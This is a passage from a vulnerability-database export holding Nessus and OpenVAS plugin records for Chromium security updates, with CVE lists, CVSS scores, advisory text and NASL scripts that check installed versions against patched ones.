script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-73.0.3683.75-2.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T17:53:13", "description": "Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 10, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "title": 
"Fedora 30 : chromium (2019-05a780936d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", "CVE-2019-5782", "CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787", "CVE-2019-5774"], "modified": "2019-05-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:30", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2019-05A780936D.NASL", "href": "https://www.tenable.com/plugins/nessus/124466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-05a780936d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124466);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", 
\"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-05a780936d\");\n\n script_name(english:\"Fedora 30 : chromium (2019-05a780936d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-05a780936d\"\n );\n 
script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-73.0.3683.75-2.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-07-04T18:43:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310814691", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814691", "type": 
"openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Mac OS X", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814691\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 15:00:23 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw 
is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:43:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310814689", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310814689", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814689\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 14:52:23 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on 
the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:43:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.", "modified": "2019-07-04T00:00:00", "published": "2019-03-05T00:00:00", "id": 
"OPENVAS:1361412562310814690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814690", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Linux", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814690\");\n script_version(\"2019-07-04T07:32:14+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 07:32:14 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-05 14:59:59 +0530 (Tue, 05 Mar 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2019-03)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to arbitrary code execution vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 
vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an use after free error\n in FileReader.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the browser, Failed attempts will\n likely cause a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 72.0.3626.121\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 72.0.3626.121 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"72.0.3626.121\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"72.0.3626.121\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:46:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "Clement Lecigne discovered a use-after-free issue in chromium", "modified": "2019-07-04T00:00:00", "published": "2019-03-09T00:00:00", "id": 
"OPENVAS:1361412562310704404", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704404", "type": "openvas", "title": "Debian Security Advisory DSA 4404-1 (chromium - security update)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704404\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_name(\"Debian Security Advisory DSA 4404-1 (chromium - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-09 00:00:00 +0100 (Sat, 09 Mar 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4404.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone 
Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\n\nWe recommend that you upgrade your chromium packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/chromium\");\n script_tag(name:\"summary\", value:\"Clement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update. The\nbrowser would always crash when launched in remote debugging mode.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromedriver\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"72.0.3626.122-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T16:53:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310852356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852356", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2019:0298-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852356\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-5786\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:41:09 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2019:0298-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.3|openSUSELeap15\\.0)\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0298-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-03/msg00011.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2019:0298-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated: to 72.0.3626.121:\n\n * CVE-2019-5786: Use-after-free in FileReader fixed (boo#1127602)\n\n * Feature fixes update only\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST 
